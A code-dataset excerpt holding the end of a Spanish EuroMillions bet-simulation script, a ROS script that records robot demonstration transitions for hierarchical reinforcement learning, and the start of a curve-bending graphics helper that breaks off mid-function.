NUMEROS euromillon en array arrayMultiple\r\n arrayNumerosEuroMillon.append(NumerosEuroMillon)\r\n # vacio array para la siguiente vuelta\r\n NumerosEuroMillon = []\r\n\r\n\r\n contEuroMillones = 0\r\n # creo series euromillones\r\n for i in range(0, numPrim):\r\n while contEuroMillones < 2:\r\n numeroAleatorio = random.randint(1, 50)\r\n # todo esto es para comprobar que cada primitiva no tiene numeros repetidos\r\n if contEuroMillones == 1:\r\n SeriesEuroMillon.append(numeroAleatorio)\r\n contEuroMillones = contEuroMillones + 1\r\n else:\r\n # si es false el numero no esta repetido\r\n if comprobarRepetidosArrayNumero(SeriesEuroMillon,numeroAleatorio) == False:\r\n SeriesEuroMillon.append(numeroAleatorio)\r\n contEuroMillones = contEuroMillones + 1\r\n\r\n contEuroMillones = 0\r\n\r\n #######################################\r\n # print('EUROMILLON SERIES ' + str(i+1))\r\n # for j in range(len(SeriesEuroMillon)):\r\n # print(SeriesEuroMillon[j], end=' ')\r\n # print()\r\n #\r\n #######################################\r\n # pongo NUMEROS euromillon en array arrayMultiple\r\n arraySeriesEuroMillon.append(SeriesEuroMillon)\r\n # vacio array para la siguiente vuelta\r\n SeriesEuroMillon = []\r\n\r\n # DEVUELVO RESULTADOS\r\n totalResultados = [arrayNumerosEuroMillon,arraySeriesEuroMillon]\r\n return totalResultados\r\n\r\n# fin funcion ########################################################\r\n\r\n# funcion para comprobar aciertos en array\r\ndef sumarRepeticionesDosArrays(arrayMisNumerosP, arrayEuro):\r\n numAciertos = 0\r\n for i in range(len(arrayEuro)):\r\n if comprobarRepetidosArrayNumero(arrayMisNumerosP , arrayEuro[i]) == True:\r\n numAciertos = numAciertos + 1\r\n return numAciertos\r\n# fin funcion ########################################################\r\n\r\n# funcion para comparar resultados\r\ndef comprobarAciertosEuroMillones(miApuesta,resultadosEuroMILLON):\r\n arrayNumeroSorteo = [] # estos son los arrays de numeros del sorteo\r\n arraySerieSorteo = [] # estos son los arrays de series del sorteo\r\n\r\n arrayNumeroApuesta = [] # estos son los arrays de numeros de la apuesta\r\n arraySerieApuesta = [] # estos son los arrays de series de la apuesta\r\n\r\n arrayNumeroApuesta = miApuesta[0] # numeros\r\n arraySerieApuesta = miApuesta[1] # series\r\n\r\n aciertosNumero0Serie0 = 0\r\n aciertosNumero1Serie0 = 0\r\n aciertosNumero2Serie0 = 0\r\n aciertosNumero3Serie0 = 0\r\n aciertosNumero4Serie0 = 0\r\n aciertosNumero5Serie0 = 0\r\n\r\n aciertosNumero0Serie1 = 0\r\n aciertosNumero1Serie1 = 0\r\n aciertosNumero2Serie1 = 0\r\n aciertosNumero3Serie1 = 0\r\n aciertosNumero4Serie1 = 0\r\n aciertosNumero5Serie1 = 0\r\n\r\n aciertosNumero0Serie2 = 0\r\n aciertosNumero1Serie2 = 0\r\n aciertosNumero2Serie2 = 0\r\n aciertosNumero3Serie2 = 0\r\n aciertosNumero4Serie2 = 0\r\n aciertosNumero5Serie2 = 0\r\n\r\n aciertosSeries0 = 0\r\n aciertosSeries1 = 0\r\n aciertosSeries2 = 0\r\n\r\n numeroTotalAciertos = 0\r\n numeroSerieAciertos = 0\r\n\r\n arrayTotalesResultadosNumSort = [] #\r\n\r\n for i in range(len(resultadosEuroMILLON)):\r\n if i == 0: # # estos son los arrays de numeros del sorteo # es doble array\r\n arrayNumeroSorteo = resultadosEuroMILLON[i] # es doble array\r\n arraySerieSorteo = resultadosEuroMILLON[1] # es doble array\r\n # compraramos con las apuestas de numeros\r\n for j in range(len(arrayNumeroSorteo)):\r\n numerosSorteo = arrayNumeroSorteo[j] # es un array\r\n seriesSorteo = resultadosEuroMILLON[1][j] # es un array\r\n # sumo los aciertos de las series por sorteo\r\n numeroSerieAciertos = sumarRepeticionesDosArrays(arrayNumeroApuesta, seriesSorteo)\r\n if numeroSerieAciertos == 0:\r\n # una vez sabemos los aciertos de las series por sorteo ,sumo los aciertos de numeroSerieAciertos\r\n # y los meto en un array\r\n # comparo con apuesta de numeros y sumo aciertos\r\n aciertosSeries0 = aciertosSeries0 + 1\r\n numeroTotalAciertos = sumarRepeticionesDosArrays(arrayNumeroApuesta, numerosSorteo)\r\n if numeroTotalAciertos == 0:\r\n aciertosNumero0Serie0 = aciertosNumero0Serie0 + 1\r\n elif numeroTotalAciertos == 1:\r\n aciertosNumero1Serie0 = aciertosNumero1Serie0 + 1\r\n elif numeroTotalAciertos == 2:\r\n aciertosNumero2Serie0 = aciertosNumero2Serie0 + 1\r\n elif numeroTotalAciertos == 3:\r\n aciertosNumero3Serie0 = aciertosNumero3Serie0 + 1\r\n elif numeroTotalAciertos == 4:\r\n aciertosNumero4Serie0 = aciertosNumero4Serie0 + 1\r\n elif numeroTotalAciertos == 5:\r\n aciertosNumero5Serie0 = aciertosNumero5Serie0 + 1\r\n elif numeroSerieAciertos == 1:\r\n aciertosSeries1 = aciertosSeries1 + 1\r\n numeroTotalAciertos = sumarRepeticionesDosArrays(arrayNumeroApuesta, numerosSorteo)\r\n if numeroTotalAciertos == 0:\r\n aciertosNumero0Serie1 = aciertosNumero0Serie1 + 1\r\n elif numeroTotalAciertos == 1:\r\n aciertosNumero1Serie1 = aciertosNumero1Serie1 + 1\r\n elif numeroTotalAciertos == 2:\r\n aciertosNumero2Serie1 = aciertosNumero2Serie1 + 1\r\n elif numeroTotalAciertos == 3:\r\n aciertosNumero3Serie1 = aciertosNumero3Serie1 + 1\r\n elif numeroTotalAciertos == 4:\r\n aciertosNumero4Serie1 = aciertosNumero4Serie1 + 1\r\n elif numeroTotalAciertos == 5:\r\n aciertosNumero5Serie1 = aciertosNumero5Serie1 + 1\r\n elif numeroSerieAciertos == 2:\r\n aciertosSeries2 = aciertosSeries2 + 1\r\n numeroTotalAciertos = sumarRepeticionesDosArrays(arrayNumeroApuesta, numerosSorteo)\r\n if numeroTotalAciertos == 0:\r\n aciertosNumero0Serie2 = aciertosNumero0Serie2 + 1\r\n elif numeroTotalAciertos == 1:\r\n aciertosNumero1Serie2 = aciertosNumero1Serie2 + 1\r\n elif numeroTotalAciertos == 2:\r\n aciertosNumero2Serie2 = aciertosNumero2Serie2 + 1\r\n elif numeroTotalAciertos == 3:\r\n aciertosNumero3Serie2 = aciertosNumero3Serie2 + 1\r\n elif numeroTotalAciertos == 4:\r\n aciertosNumero4Serie2 = aciertosNumero4Serie2 + 1\r\n elif numeroTotalAciertos == 5:\r\n aciertosNumero5Serie2 = aciertosNumero5Serie2 + 1\r\n\r\n\r\n\r\n # entonces imprimimos los resultados\r\n print('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx')\r\n print('xxxxxxxRESULTADOSxxxxxxxxxxxxxxxxx')\r\n print('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx')\r\n print( str(aciertosNumero0Serie0) + ' BOLETOS CON 0 ACIERTOS CON 0 SERIES ACERTADAS')\r\n print( str(aciertosNumero1Serie0) + ' BOLETOS CON 1 ACIERTOS CON 0 SERIES ACERTADAS')\r\n print( str(aciertosNumero2Serie0) + ' BOLETOS CON 2 ACIERTOS CON 0 SERIES ACERTADAS')\r\n print( str(aciertosNumero3Serie0) + ' BOLETOS CON 3 ACIERTOS CON 0 SERIES ACERTADAS')\r\n print( str(aciertosNumero4Serie0) + ' BOLETOS CON 4 ACIERTOS CON 0 SERIES ACERTADAS')\r\n print( str(aciertosNumero4Serie0) + ' BOLETOS CON 5 ACIERTOS CON 0 SERIES ACERTADAS')\r\n print('')\r\n print( str(aciertosNumero0Serie1) + ' BOLETOS CON 0 ACIERTOS CON 1 SERIES ACERTADAS')\r\n print( str(aciertosNumero1Serie1) + ' BOLETOS CON 1 ACIERTOS CON 1 SERIES ACERTADAS')\r\n print( str(aciertosNumero2Serie1) + ' BOLETOS CON 2 ACIERTOS CON 1 SERIES ACERTADAS')\r\n print( str(aciertosNumero3Serie1) + ' BOLETOS CON 3 ACIERTOS CON 1 SERIES ACERTADAS')\r\n print( str(aciertosNumero4Serie1) + ' BOLETOS CON 4 ACIERTOS CON 1 SERIES ACERTADAS')\r\n print( str(aciertosNumero4Serie1) + ' BOLETOS CON 5 ACIERTOS CON 1 SERIES ACERTADAS')\r\n print('')\r\n print( str(aciertosNumero0Serie2) + ' BOLETOS CON 0 ACIERTOS CON 2 SERIES ACERTADAS')\r\n print( str(aciertosNumero1Serie2) + ' BOLETOS CON 1 ACIERTOS CON 2 SERIES ACERTADAS')\r\n print( str(aciertosNumero2Serie2) + ' BOLETOS CON 2 ACIERTOS CON 2 SERIES ACERTADAS')\r\n print( str(aciertosNumero3Serie2) + ' BOLETOS CON 3 ACIERTOS CON 2 SERIES ACERTADAS')\r\n print( str(aciertosNumero4Serie2) + ' BOLETOS CON 4 ACIERTOS CON 2 SERIES ACERTADAS')\r\n print( str(aciertosNumero4Serie2) + ' BOLETOS CON 5 ACIERTOS CON 2 SERIES ACERTADAS')\r\n\r\n# fin funcion ########################################################\r\n\r\n# operaciones\r\nmiApuesta = introducirMiApuestaMultiple()\r\nresultadosEuroMILLON = crearResultadosEuromillon()\r\ncomprobarAciertosEuroMillones(miApuesta,resultadosEuroMILLON)\r\n","sub_path":"Listas/EuroMillon_ApuestaMultiple.py","file_name":"EuroMillon_ApuestaMultiple.py","file_ext":"py","file_size_in_byte":14894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"307864120","text":"#!/usr/bin/env python\n\nimport numpy as np\nfrom Sawyer_DynaGoalEnv_DAgger import demoEnv # REFACTOR TO REMOVE GOALS\nimport rospy\n# Leveraging demonstration is same as TD3\n\n\nfrom std_srvs.srv import Empty, EmptyRequest\nfrom running_mean_std import RunningMeanStd\nfrom SetupSummary import SummaryManager_HIRO as SummaryManager\nimport pickle\nimport os\nfrom collections import OrderedDict\nfrom state_action_space import *\n# intera imports \nfrom intera_interface import CHECK_VERSION\nfrom intera_interface import Limb\nfrom intera_interface import Gripper\n\nfrom tf_conversions import posemath\nfrom tf.msg import tfMessage\nfrom tf.transformations import quaternion_from_euler\nfrom intera_core_msgs.msg import (\n DigitalIOState,\n DigitalOutputCommand,\n IODeviceStatus\n)\n\nfrom geometry_msgs.msg import (\n PoseStamped,\n Pose,\n Point,\n Quaternion,\n)\n\nimport time as timer\nimport time\n\nfrom std_msgs.msg import Header\n# save running mean std for demo transition\nfrom SetupSummary import SummaryManager_HIRO as SummaryManager\nrms_path = '/home/irobot/catkin_ws/src/ddpg/scripts/ecsac_aux/'\ndemo_path = '/home/irobot/catkin_ws/src/ddpg/scripts/ecsac_aux/'\nMAN_BUF_FNAME = 'demo_manager_buffer.bin'\nCON_BUF_FNAME = 'demo_controller_buffer.bin'\n\nclass DemoReplayBuffer(object):\n \"\"\"\n A simple FIFO experience replay buffer for ECSAC + HIRO agents.\n For HIRO, we need seperate replay buffers for both manager and controller policies.\n low-level controller does not require state-action sequence\n high-level controller requires extra buffer for state-action \n \"\"\"\n\n def __init__(self, obs_dim, stt_dim, act_dim, aux_dim, size, manager=False):\n # 9 types of data in buffer\n self.obs_buf = np.zeros(shape=(size,)+ obs_dim, dtype=np.float32) # o_t, (-1,100,100,3)\n self.obs1_buf = np.zeros(shape=(size,)+ obs_dim, dtype=np.float32) # o_t+1, (-1,100,100,3)\n self.g_buf = np.zeros(shape=(size , stt_dim), dtype=np.float32) # g_t, (-1,21)\n self.g1_buf = np.zeros(shape=(size , stt_dim), dtype=np.float32) # g_t+1, (-1,21)\n self.stt_buf = np.zeros(shape=(size , stt_dim), dtype=np.float32) # s_t (-1,21), joint pos, vel, eff\n self.stt1_buf = np.zeros(shape=(size , stt_dim), dtype=np.float32) # s_t+1 for (-1,21), consists of pos, vel, eff self.act_buf = np.zeros(shape=(size, act_dim), dtype=np.float32) # A+t 3 dim for action\n if not manager:\n self.act_buf = np.zeros(shape=(size , act_dim), dtype=np.float32) # a_t (-1,8)\n else:\n self.act_buf = np.zeros(shape=(size , stt_dim), dtype=np.float32)\n self.rews_buf = np.zeros(shape=(size,), dtype=np.float32)\n self.done_buf = np.zeros(shape=(size,), dtype=np.float32)\n self.aux_buf = np.zeros(shape=(size , aux_dim), dtype=np.float32)\n self.aux1_buf = np.zeros( shape=(size , aux_dim), dtype=np.float32)\n self.ptr, self.size, self.max_size = 0, 0, size\n\n def store(self, obs, obs1, g, g1, stt, stt1, act, aux, aux1, rew, done, manager=False):\n \"\"\"store step transition in the buffer\n \"\"\"\n self.obs_buf[self.ptr] = obs\n self.obs1_buf[self.ptr] = obs1\n self.g_buf[self.ptr] = g\n self.g1_buf[self.ptr] = g1\n self.stt_buf[self.ptr] = stt\n self.stt1_buf[self.ptr] = stt1\n self.act_buf[self.ptr] = act\n self.rews_buf[self.ptr] = rew\n self.done_buf[self.ptr] = done\n self.aux_buf[self.ptr] = aux\n self.aux1_buf[self.ptr] = aux\n if not manager:\n self.ptr = (self.ptr+1) % self.max_size\n self.size = min(self.size+1, self.max_size)\n\n\n def get_episodic_subgoal(self, global_step, ep_len):\n \"\"\" Return the subgoal and fullstate batch of the episode.\n \n slicing index : buf[global_step - ep_len:global_step-1] => slice out only the transitions for this episode.\n \"\"\"\n return [self.stt_buf[global_step-ep_len:global_step], self.stt1_buf[global_step-ep_len:global_step], \n self.g_buf[global_step-ep_len:global_step], self.g1_buf[global_step-ep_len:global_step]]\n\n\n def return_buffer(self):\n \"\"\" Returns the whole numpy arrays containing demo transitions.\n \"\"\"\n return {'data':[self.obs_buf[:self.ptr], self.obs1_buf[:self.ptr], self.g_buf[:self.ptr], \n self.g1_buf[:self.ptr], self.stt_buf[:self.ptr], self.stt1_buf[:self.ptr],\n self.act_buf[:self.ptr], self.rews_buf[:self.ptr], self.done_buf[:self.ptr],\n self.aux_buf[:self.ptr], self.aux1_buf[:self.ptr]],\n 'size':self.size}\n\n\nclass DemoManagerReplayBuffer(DemoReplayBuffer):\n \"\"\"\n A simple FIFO experience replay buffer for ECSAC + HIRO agents.\n For HIRO, we need seperate replay buffers for both manager and controller policies.\n low-level controller does not require state-action sequence\n high-level controller requires extra buffer for state-action \n \"\"\"\n\n def __init__(self, obs_dim, stt_dim, act_dim, aux_dim, size, seq_len):\n \"\"\"full-state/ color_observation sequence lists' shape[1] is +1 longer than that of \n action seqence -> they are stored as s_t:t+c/o_t:t+c, while action is stored as a_t:t+c\n \"\"\"\n\n super(DemoManagerReplayBuffer, self).__init__(obs_dim, stt_dim, act_dim, aux_dim, size, manager=True)\n\n self.stt_seq_buf = np.zeros(shape=(size, seq_len+1, stt_dim), dtype=np.float32) # s_t (-1, 10+1, 21), joint pos, vel, eff\n self.obs_seq_buf = np.zeros(shape=(size, seq_len+1,)+ obs_dim, dtype=np.float32) # o_t, (-1, 10+1, 100, 100, 3)\n self.act_seq_buf = np.zeros(shape=(size, seq_len, act_dim), dtype=np.float32) # a_t (-1,10, 8)\n\n def store(self, stt_seq, obs_seq, act_seq, *args, **kwargs):\n \"\"\"store step transition in the buffer\n \"\"\"\n super(DemoManagerReplayBuffer, self).store(manager=True, *args, **kwargs)\n \n self.stt_seq_buf[self.ptr] = np.array(stt_seq)\n self.obs_seq_buf[self.ptr] = np.array(obs_seq)\n self.act_seq_buf[self.ptr] = np.array(act_seq)\n self.ptr = (self.ptr+1) % self.max_size\n self.size = min(self.size+1, self.max_size)\n\n def return_buffer(self):\n \"\"\" Returns the whole numpy arrays containing demo transitions, for manager transitions\n \"\"\"\n return {'data':[self.obs_buf[:self.ptr], self.obs1_buf[:self.ptr], self.g_buf[:self.ptr],\n self.g1_buf[:self.ptr], self.stt_buf[:self.ptr], self.stt1_buf[:self.ptr],\n self.act_buf[:self.ptr], self.rews_buf[:self.ptr], self.done_buf[:self.ptr],\n self.aux_buf[:self.ptr], self.aux1_buf[:self.ptr]],\n 'seq_data':[self.stt_seq_buf[:self.ptr], self.obs_seq_buf[:self.ptr], self.act_seq_buf[:self.ptr]],\n 'size':self.size}\n\n\ndef normalize(x, stats):\n if stats is None:\n return x\n return (x - stats.mean) / stats.std\n\n\n# def normalize_action(action_arr):\n# lb_array = ACTION_LOW_BOUND*np.ones(action_arr.shape)\n# hb_array = ACTION_HIGH_BOUND*np.ones(action_arr.shape)\n# _norm_action = lb_array + (action_arr+1.0*np.ones(action_arr.shape))*0.5*(hb_array - lb_array)\n# _norm_action = np.clip(_norm_action, lb_array, hb_array)\n# _norm_action = _norm_action.reshape(action_arr.shape)\n# return _norm_action\n\n\ndef randomize_world():\n \"\"\" Domain randomization for the environment's light and the color of robot link.\n \"\"\"\n rospy.wait_for_service('/dynamic_world_service') # randomize the light in the gazebo world\n dynamic_world_service_call = rospy.ServiceProxy('/dynamic_world_service', Empty)\n change_env_request = EmptyRequest()\n dynamic_world_service_call(change_env_request)\n\n # rospy.wait_for_service('/colorize_world_service') # randomize the model colors in the gazebo world\n # colorize_world_service_call = rospy.ServiceProxy('/colorize_world_service', Empty)\n # colorize_env_request = EmptyRequest()\n # colorize_world_service_call(colorize_env_request)\n\nif __name__ == '__main__':\n\n USE_CARTESIAN = True\n USE_GRIPPER = True\n IS_TRAIN = True # always true for DAgger script\n\n # define observation dimensions\n # for low_level controller\n obs_dim = (100, 100, 3) # for actor in POMDP\n stt_dim = 21# full_state of the robot (joint positions, velocities, and efforts) + ee position\n act_dim = 8 # 7 joint vels and gripper position \n aux_dim = 3 # target object's position\n # define joint vel_limits\n action_space = (-1.0, 1.0)\n ee_dim = 7 # 4 quaternion\n grip_dim = 1 # 1 dimension for the gripper position\n\n # for high_level controller\n des_goal_dim = 21 # (joint positions, velocities, and efforts) + ee position\n sub_goal_dim = 21 # (joint positions, velocities, and efforts) + ee position\n\n if USE_CARTESIAN: # append 7-dim\n stt_dim += ee_dim\n des_goal_dim += ee_dim\n sub_goal_dim += ee_dim\n\n if USE_GRIPPER: # append 1-dim\n stt_dim += grip_dim\n des_goal_dim += grip_dim\n sub_goal_dim += grip_dim\n\n # init node\n # rospy.init_node('hierarchical_DAgger')\n\n # demo quantity related\n total_epi = 1\n max_ep_len = 500\n total_steps = total_epi * max_ep_len\n buffer_size = int(1e4) # 50000 steps : is it enough?\n manager_propose_freq = 10\n\n isDemo = True\n ep_ret, ep_len = 0, 0\n t = 0 # counted steps [0:total_steps - 1]\n timesteps_since_manager = 0 # to count c-step elapse for training manager\n timesteps_since_subgoal = 0 # to count c-step elapse for subgoal proposal\n episode_num = 0 # incremental episode counter\n done = True\n reset = False\n manager_temp_transition = list() # temp manager transition\n\n # demoEnv inherits robotEnv\n env = demoEnv(max_steps=max_ep_len, control_mode='velocity', isPOMDP=True, isGripper=USE_GRIPPER, isCartesian=USE_CARTESIAN, train_indicator=IS_TRAIN)\n controller_buffer = DemoReplayBuffer(obs_dim=obs_dim, stt_dim=stt_dim, act_dim=act_dim, aux_dim=aux_dim, size=buffer_size)\n manager_buffer = DemoManagerReplayBuffer(obs_dim=obs_dim, stt_dim=stt_dim, act_dim=act_dim, aux_dim=aux_dim, size=buffer_size, seq_len=manager_propose_freq)\n obs_shape_list = [(100,100,3), (7), (7), (7), (1), (7), (3)]\n summary_manager = SummaryManager(obs_shape_list=obs_shape_list) # manager for rms\n\n # create instances for the arm and gripper\n limb = Limb()\n gripper = Gripper()\n\n def update_rms(full_stt=None, c_obs=None, aux=None, act=None):\n \"\"\"Update the mean/stddev of the running mean-std normalizers.\n Normalize full-state, color_obs, and auxiliary observation.\n Caution on the shape!\n \"\"\"\n summary_manager.s_t0_rms.update(c_obs) # c_obs\n summary_manager.s_t1_rms.update(full_stt[:7]) # joint_pos\n summary_manager.s_t2_rms.update(full_stt[7:14]) # joint_vel\n summary_manager.s_t3_rms.update(full_stt[14:21]) # joint_eff\n summary_manager.s_t4_rms.update(full_stt[21:22]) # gripper_position\n summary_manager.s_t5_rms.update(full_stt[22:]) # ee_pose\n summary_manager.s_t6_rms.update(aux) # aux\n summary_manager.a_t_rms.update(act) # ee_pose\n\n\n def load_rms():\n rospy.logwarn('Loads the mean and stddev for test time')\n summary_manager.s_t0_rms.load_mean_std(rms_path+'mean_std0_demo.bin')\n summary_manager.s_t1_rms.load_mean_std(rms_path+'mean_std1_demo.bin')\n summary_manager.s_t2_rms.load_mean_std(rms_path+'mean_std2_demo.bin')\n summary_manager.s_t3_rms.load_mean_std(rms_path+'mean_std3_demo.bin')\n summary_manager.s_t4_rms.load_mean_std(rms_path+'mean_std4_demo.bin')\n summary_manager.s_t5_rms.load_mean_std(rms_path+'mean_std5_demo.bin')\n summary_manager.s_t6_rms.load_mean_std(rms_path+'mean_std6_demo.bin')\n summary_manager.a_t_rms.load_mean_std(rms_path+'mean_std7_demo.bin')\n \n\n def save_rms(step):\n rospy.logwarn('Saves the mean and stddev @ step %d', step)\n summary_manager.s_t0_rms.save_mean_std(rms_path+'mean_std0_demo.bin')\n summary_manager.s_t1_rms.save_mean_std(rms_path+'mean_std1_demo.bin')\n summary_manager.s_t2_rms.save_mean_std(rms_path+'mean_std2_demo.bin')\n summary_manager.s_t3_rms.save_mean_std(rms_path+'mean_std3_demo.bin')\n summary_manager.s_t4_rms.save_mean_std(rms_path+'mean_std4_demo.bin')\n summary_manager.s_t5_rms.save_mean_std(rms_path+'mean_std5_demo.bin')\n summary_manager.s_t6_rms.save_mean_std(rms_path+'mean_std6_demo.bin')\n summary_manager.a_t_rms.save_mean_std(rms_path+'mean_std7_demo.bin')\n \n\n def get_demo_temp_subgoal():\n \"\"\" return the temporary subgoal for demo transition.\n \"\"\"\n return np.zeros(sub_goal_dim)\n\n\n def demo_manager_sg_transition(manager_transition):\n \"\"\" This function is called every C-step.\n replace the temp subgoals in temp manager buffer with expert subgoals for the rollout batches.\n The demo agent achieves the subgoal for every step, i.e. h = s + g - s'\n g_t == s_t+c (action of the manager)\n *manager_transition :\n [s_seq, o_seq, a_seq, obs, obs_1, dg, dg_1, stt, stt_1, act, aux, aux_1, rew, done]\n replace the temp. subgoal (a_t of the manager) with s_t+c-1\n \"\"\"\n manager_transition[-5] = manager_transition[0][-1]\n return manager_transition\n\n\n def demo_controller_sg_transition(controller_buffer, global_step, ep_len):\n \"\"\" This function is called at the end of each episode.\n *controller_buffer :\n controller_buffer.store(c_obs, next_c_obs, subgoal, \n next_subgoal, full_stt, next_full_stt, action, aux, next_aux, intrinsic_reward, done)\n subgoal for the controller -> for every C-step sequence,\n * h = s + g - s'\n g_t == s_t+c, g' = h(s,g,s'), g'' = h(s',g',s'') ...\n *don't do subgoal_transition and intrinsic reward computation while doing rollouts. \n controller transition (s_t||s_t+c & s_t+1||s_t+c+1) -> TD learning\n in terms of controller -> g_t:t+c-1\n index : 2 & 3\n \"\"\"\n # s_t+c should be the g_t for s_t. (e.g. s_10 == g_0 -> induces new proposal)\n sb, s1b, gb, g1b = controller_buffer.get_episodic_subgoal(global_step, ep_len) # returns each batch of the transition e\n # ep_len - ep_len % manager_propose_freq\n # Example : if an episode is 647 length, iterate till 640 (idx 639). Then, gb[640:646] should all be the terminal state. \n # 1. replace the subgoal proposals in 'gb'\n\n remainder = ep_len % manager_propose_freq\n for idx in range(0, ep_len - remainder - manager_propose_freq, manager_propose_freq): # iterate until the full proposal period is met.\n gb[idx] = s1b[idx + manager_propose_freq - 1] # s1b[idx + manager_propose_freq - 1] has the s_(idx + manager_propose_freq)\n for i in range(1, manager_propose_freq): #[t+1:t+c-1]\n gb[idx + i] = env.env_goal_transition(sb[idx + i], s1b[idx + i], gb[idx])\n # 2. fill ther remaining transitions with terminal state observations\n # here, gb[-1], gb[-2], ... gb[-7] = sT in example. \n sT = s1b[-1]\n for idx in range(1,remainder + 1):\n gb[-idx] = sT\n # 3. copy the gb into g1b, with the index offset of 1. Then the last element of g1b is sT.\n g1b[:-1] = gb[1:]\n g1b[-1] = sT\n \n\n def get_action():\n \"\"\" return the action inference from the external controller.\n \"\"\"\n return env._get_demo_action()\n \n\n # divide the loop into two phase.\n # 1. rollout (collecting normal transition data (s, a, r, s', d))\n\n while not rospy.is_shutdown() and t task specific goal!\n done = False\n reset = False\n ep_len = 0 # length of the episode\n ep_ret = 0 # episode return for the manager\n ep_low_ret = 0 # return of the intrinsic reward for low level controller \n episode_num += 1 # for every env.reset()\n\n # process observations\n full_stt = np.concatenate(obs['observation']['full_state'], axis=0) # s_0\n c_obs = obs['observation']['color_obs'] #o_0\n des_goal = np.concatenate(obs['desired_goal']['full_state'], axis=0) # g_des\n aux = obs['auxiliary'] # g_des\n\n # infer subgoal for low-level policy\n # args for get_subgoal : obs, next_obs, sub_goal\n subgoal = get_demo_temp_subgoal() # action_dim = (1, stt_dim) -> defaults to 25-dim\n timesteps_since_subgoal = 0\n # apply noise on the subgoal\n # create a temporal high-level transition : requires off-policy correction\n # buffer store arguments : s_seq, o_seq, a_seq, obs, obs_1, dg, dg_1, stt, stt_1, act, aux, aux_1, rew, done \n manager_temp_transition = [[full_stt], [c_obs], [], c_obs, None, des_goal, des_goal, full_stt, None, subgoal, aux, None, 0, False]\n\n action = get_action() # a_t\n # TODO: make action on the gripper as categorical policy\n # action[-1] = reloc_rescale_gripper(action[-1])\n next_obs, manager_reward, done = env.step_demo(action, time_step=ep_len) # reward R_t-> for high-level manager -> for sum(R_t:t+c-1)\n randomize_world()\n # update episodic logs\n # Ignore the \"done\" signal if it comes from hitting the time\n # horizon (that is, when it's an artificial terminal signal\n # that isn't based on the agent's state) -> if done = False for the max_timestep\n # DO NOT Make done = True when it hits timeout\n ep_ret += manager_reward # reward in terms of achieving episodic task\n done = False if ep_len== max_ep_len else done\n if done:\n rospy.logwarn('=============== Now epsiode %d ends with done signal! ====================', episode_num)\n next_full_stt = np.concatenate(next_obs['observation']['full_state']) # s_t\n next_c_obs = next_obs['observation']['color_obs'] #o_t\n next_aux = obs['auxiliary'] # g_des\n\n # append manager transition\n manager_temp_transition[-1] = float(True)\n manager_temp_transition[-2] += manager_reward # sum(R_t:t+c)\n manager_temp_transition[0].append(next_full_stt) # append s_seq\n manager_temp_transition[1].append(next_c_obs) # append o_seq\n manager_temp_transition[2].append(action) # append a_seq \n # compute intrinsic reward\n intrinsic_reward = env.compute_intrinsic_reward(full_stt, next_full_stt, subgoal)\n\n # subgoal transition\n next_subgoal = env.env_goal_transition(full_stt, next_full_stt, subgoal)\n # add transition for low-level policy\n # (obs, obs1, sg, sg1, stt, stt1, act, aux, rew, done)\n controller_buffer.store(c_obs, next_c_obs, subgoal, \n next_subgoal, full_stt, next_full_stt, action, aux, next_aux, intrinsic_reward, done)\n # update observations and subgoal\n obs = next_obs\n subgoal = next_subgoal\n aux = next_aux\n\n # update logging steps\n ep_len += 1\n t +=1\n timesteps_since_manager += 1\n timesteps_since_subgoal += 1\n\n if timesteps_since_subgoal % manager_propose_freq == 0:\n # for every c-step, renew the subgoal estimation from the manager policy.\n timesteps_since_subgoal = 0\n manager_temp_transition[4] = c_obs # save o_t+c\n manager_temp_transition[8] = full_stt # save s_t+c\n manager_temp_transition[11] = aux # save aux_t+c\n manager_temp_transition[-1] = float(True) # done = True for manager, regardless of the episode \n \n # intentional seq appending is not required here since it always satisfies c step.\n\n # rospy.logwarn('Debug manager transitions. Debug manager transitions.')\n # print (manager_temp_transition[2])\n # rospy.logwarn('Debug manager transitions. Debug manager transitions.')\n manager_buffer.store(*manager_temp_transition)\n subgoal = get_demo_temp_subgoal() # action_dim = (1, stt_dim) -> defaults to 25-dim\n # Create a high level transition : note that the action of manager policy is subgoal\n # buffer store arguments : s_seq, o_seq, a_seq, obs, obs_1, dg, dg_1, stt, stt_1, act, aux, aux_1, rew, done \n manager_temp_transition = [[full_stt], [c_obs], [], c_obs, None, des_goal, des_goal, full_stt, None, subgoal, aux, None, 0, False]\n # update running mean-std normalizer\n update_rms(full_stt=full_stt, c_obs=c_obs, aux=aux, act=action) # do it.\n\n # if all the demo episodes have ended.\n\n os.chdir(demo_path)\n if os.path.exists(MAN_BUF_FNAME):\n print ('Deletes the manger buffer')\n ans = input(\"Delete the manager buffer? '1' / '0' \")\n rospy.logwarn('=======================================================')\n if ans == 1:\n os.remove(MAN_BUF_FNAME)\n if os.path.exists(CON_BUF_FNAME):\n print ('Deletes the controller buffer')\n ans = input(\"Delete the controller buffer? '1' / '0' \")\n if ans == 1:\n os.remove(CON_BUF_FNAME)\n rospy.logwarn('=======================================================')\n\n print ('Now saves the manager buffer in pickle format')\n with open (MAN_BUF_FNAME, 'wb') as f: \n pickle.dump(manager_buffer.return_buffer(), f)\n print ('Now saves the controller buffer in pickle format')\n with open (CON_BUF_FNAME, 'wb') as f2: \n pickle.dump(controller_buffer.return_buffer(), f2)\n\n\n ","sub_path":"hierarchical_DAgger.py","file_name":"hierarchical_DAgger.py","file_ext":"py","file_size_in_byte":24203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"229615194","text":"import math\nfrom coldtype.beziers import CurveCutter, splitCubicAtT\n\n\ndef bend(pen, curve, tangent=True):\n def _bend(pen):\n cc = CurveCutter(curve)\n ccl = cc.length\n dpl = pen.bounds().point(\"SE\").x\n xf = ccl/dpl\n\n def bender(x, y):\n p, tan = cc.subsegmentPoint(end=x*xf)\n px, py = p\n if tangent:\n a = math.sin(math.radians(180+tan)) * y\n b = math.cos(math.radians(180+tan)) * y\n return (px+a, py+b)\n #return (px, y+py)\n else:\n return (px, y+py)\n return pen.nonlinear_transform(bender)\n return _bend\n\n\ndef bend2(curve, tangent=True, offset=(0, 1)):\n def _bend(pen):\n bw = pen.bounds().w\n a = curve.value[0][-1][0]\n b, c, d = curve.value[1][-1]\n def bender(x, y):\n c1, c2 = splitCubicAtT(a, b, c, d, offset[0] + (x/bw)*offset[1])\n _, _a, _b, _c = c1\n if tangent:\n tan = 